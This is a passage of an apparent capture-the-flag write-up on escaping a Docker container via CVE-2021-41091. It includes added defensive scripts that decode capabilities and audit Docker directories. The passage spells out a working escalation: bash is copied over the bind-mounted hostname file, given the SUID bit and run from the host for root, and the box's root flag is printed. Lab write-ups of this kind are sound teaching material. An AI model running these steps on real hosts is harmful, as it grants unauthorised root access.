    4:hugetlb:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    3:devices:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    2:cpuset:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    1:name=systemd:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    0::/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
2023/05/02 01:06:07 /proc/self/cgroup file added content (compare pid 1) :

From the information gathered we highlight:

  • The mounts: the entrypoint.sh file lives in /root/cacti/ on the host, and three files from /etc/ are inside the folder /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/.
8:2 /root/cacti/entrypoint.sh /entrypoint.sh rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname /etc/hostname rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts /etc/hosts rw,relatime - ext4 /dev/sda2 rw
  • From the same output we also get the container's full ID.
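CDK prints each capability set as a hex mask and then a decoded list. The decoding is nothing more than bit positions from linux/capability.h, so it can be checked without the tool. The following is an added example, not CDK's code or part of the original post, that decodes a CapEff value and answers the question a defender cares about: whether a specific capability such as CAP_SYS_ADMIN is present. The mask is the one from the output above; the function names are my own.

```shell
#!/bin/sh
# Added example: decode a Linux capability bitmask (as printed by CDK or by
# /proc/<pid>/status CapEff) into names. Assumes POSIX sh with 64-bit arithmetic
# and hex constants (dash and bash both provide them).

# Capability names ordered by their number in linux/capability.h (bit 0 first).
CAP_NAMES="CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID \
CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE \
CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER CAP_SYS_MODULE \
CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT \
CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE \
CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG \
CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE"

# decode_caps HEXMASK -> comma-separated capability names, lowest bit first
decode_caps() {
    mask=$((0x$1))
    i=0; out=""
    for name in $CAP_NAMES; do
        if [ $(( (mask >> i) & 1 )) -eq 1 ]; then
            out="${out:+$out,}$name"
        fi
        i=$((i + 1))
    done
    printf '%s\n' "$out"
}

# has_cap HEXMASK CAP_NAME -> exit 0 if the capability is in the mask, 1 otherwise
has_cap() {
    case ",$(decode_caps "$1")," in
        *",$2,"*) return 0 ;;
    esac
    return 1
}

# Stand-alone demo with the CapEff value CDK reported for the Cacti container.
CACTI_CAPEFF=00000000a00425f9
echo "CapEff $CACTI_CAPEFF = $(decode_caps "$CACTI_CAPEFF")"
for c in CAP_SYS_ADMIN CAP_SYS_PTRACE CAP_DAC_OVERRIDE CAP_SETUID; do
    if has_cap "$CACTI_CAPEFF" "$c"; then echo "  $c: present"; else echo "  $c: absent"; fi
done
```

The decoded set is a subset of Docker's default and still contains CAP_SETUID and CAP_SETGID, which is what allows the setuid-root capsh found earlier to switch www-data to uid 0 inside the container. Dropping capabilities the workload does not need (`--cap-drop`) and building images without stray setuid binaries removes that step.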

With that information we can continue with the CVE explanation, quoting another part of it.

When containers included executable programs with extended permission bits (such as setuid), unprivileged Linux users could discover and execute those programs. ..

Now, with the container ID, we can see certain files, although only three: resolv.conf, hostname and hosts.

marcus@monitorstwo:~$ ls -lah /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts
-rw-r--r-- 1 root root 174 May  4 00:28 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts
marcus@monitorstwo:~$ cat /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts
127.0.0.1   localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.19.0.3  50bca5e748b0
marcus@monitorstwo:~$

If we change the /etc/hosts file inside the container:

# container
chmod 777 /etc/hosts
ls -lah /etc/hosts
-rwxrwxrwx 1 root root 174 May  4 00:28 /etc/hosts

We see the change reflected on the host.

# host
marcus@monitorstwo:~$ ls -lah /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts
-rwxrwxrwx 1 root root 174 May  4 00:28 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts
marcus@monitorstwo:~$

Taking this into account, we modified the /etc/hostname file by copying bash over it and finally gave it the SUID bit.

cp /bin/bash /etc/hostname
chmod +x /etc/hostname
chmod u+s /etc/hostname
file /etc/hostname
/etc/hostname: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=31c321f9f0c1f86a379f7efaaeb75f707998f27f, for GNU/Linux 3.2.0, stripped

As we can see, the user marcus sees the modified file with the permissions we gave it.

marcus@monitorstwo:~$ ls -lah /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname
-rwsr-xr-x 1 root root 1.2M May  4 01:25 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname
marcus@monitorstwo:~$ file /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname
/var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=31c321f9f0c1f86a379f7efaaeb75f707998f27f, for GNU/Linux 3.2.0, stripped
marcus@monitorstwo:~$

And, as the CVE explained, a low-privileged user can execute these programs; in this case we ran bash with the -p flag (GTFOBins), which gave us a shell as root and our root.txt flag.

marcus@monitorstwo:~$ /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname -p
hostname-5.1# id
uid=1000(marcus) gid=1000(marcus) euid=0(root) egid=0(root) groups=0(root),1000(marcus)
hostname-5.1# cd /root
hostname-5.1# ls
cacti  root.txt
hostname-5.1# cat root.txt
ade2fb8718fc0bbc33cdccebd0057c04
hostname-5.1#

In summary:

  • We need the container's full ID; with it we can find the container's directory on the host under /var/lib/docker/containers/.
  • With that, we modify a file that is accessible from the host, in this case hostname, which we can change from inside the container.
  • Being able to modify a file the host can reach, we give it the SUID bit so that it can be executed on the host to escalate privileges.
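The conditions that the CVE-2021-41091 advisory describes, and that this box met, can be checked from the host side. The script below is an added example, not the original post's or Moby's code: it tells whether a `docker --version` string predates the 20.10.9 fix, lists data-directory subdirectories that carry the other-execute bit, reports setuid/setgid files under containers/ (where the bind-mounted hostname, hosts and resolv.conf live), and applies the same removal of the other-bits that the fixed daemon performs on restart. It builds a constructed sample tree for the demo; for real use it is run against /var/lib/docker as root. The function names are my own.

```shell
#!/bin/sh
# Added example: audit a Docker data directory for the CVE-2021-41091 conditions.
# Assumes GNU/BSD find (-maxdepth) and a POSIX sh. Real use needs root:
#   sudo sh audit_docker_dir.sh /var/lib/docker

# docker_version_vulnerable "Docker version X.Y.Z ..." -> 0 if X.Y.Z < 20.10.9, 1 if not, 2 if unparsable
docker_version_vulnerable() {
    ver=$(printf '%s\n' "$1" | sed -n 's/^Docker version \([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\).*/\1/p')
    if [ -z "$ver" ]; then return 2; fi
    major=${ver%%.*}; rest=${ver#*.}; minor=${rest%%.*}; patch=${rest#*.}
    if [ "$major" -lt 20 ]; then return 0; fi
    if [ "$major" -eq 20 ] && [ "$minor" -lt 10 ]; then return 0; fi
    if [ "$major" -eq 20 ] && [ "$minor" -eq 10 ] && [ "$patch" -lt 9 ]; then return 0; fi
    return 1
}

# traversable_dirs DIR -> directories down to depth 2 (DIR itself included) that
# other users may traverse (o+x), the bit the advisory is about
traversable_dirs() {
    find "$1" -maxdepth 2 -type d -perm -001 2>/dev/null
}

# setuid_files_in_containers DIR -> setuid or setgid files under DIR/containers
setuid_files_in_containers() {
    find "$1/containers" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# audit_docker_dir DIR -> one line per finding; empty output means clean
audit_docker_dir() {
    traversable_dirs "$1" | sed 's|^|TRAVERSABLE (o+x) dir: |'
    setuid_files_in_containers "$1" | sed 's|^|SETUID/SETGID file under containers/: |'
}

# harden_docker_dir DIR -> strip the other-bits from every traversable dir found
# (the 0710-style modes the fixed daemon applies); files inside are left for review
harden_docker_dir() {
    traversable_dirs "$1" | while IFS= read -r d; do chmod o-rwx "$d"; done
}

# make_sample_tree DIR -> constructed layout mimicking a pre-fix data dir: the data
# dir and containers/<id> are 0711 and the bind-mounted hostname is a setuid file
make_sample_tree() {
    cid=50bca5e748b0constructed
    mkdir -p "$1/containers/$cid/mounts" "$1/image" "$1/overlay2"
    chmod 711 "$1" "$1/containers" "$1/containers/$cid"
    chmod 700 "$1/image" "$1/overlay2" "$1/containers/$cid/mounts"
    printf '127.0.0.1 localhost\n' > "$1/containers/$cid/hosts"
    printf '#!/bin/sh\n' > "$1/containers/$cid/hostname"
    chmod 644 "$1/containers/$cid/hosts"
    chmod 4755 "$1/containers/$cid/hostname"
}

# Stand-alone demo on a constructed tree (point it at /var/lib/docker for real use).
if docker_version_vulnerable "Docker version 20.10.5+dfsg1, build 55c4c88"; then
    echo "engine 20.10.5 predates the 20.10.9 fix"
fi
demo=$(mktemp -d)
make_sample_tree "$demo"
echo "== before hardening =="; audit_docker_dir "$demo"
harden_docker_dir "$demo"
echo "== after hardening (the setuid file still needs the container rebuilt) =="
audit_docker_dir "$demo"
rm -rf "$demo"
```

The permission fix alone is not the whole remediation: as the bulletin in marcus's mailbox says, the engine has to be upgraded and running containers restarted, and any setuid file the audit reports under containers/ points at a container whose image or runtime state should be reviewed.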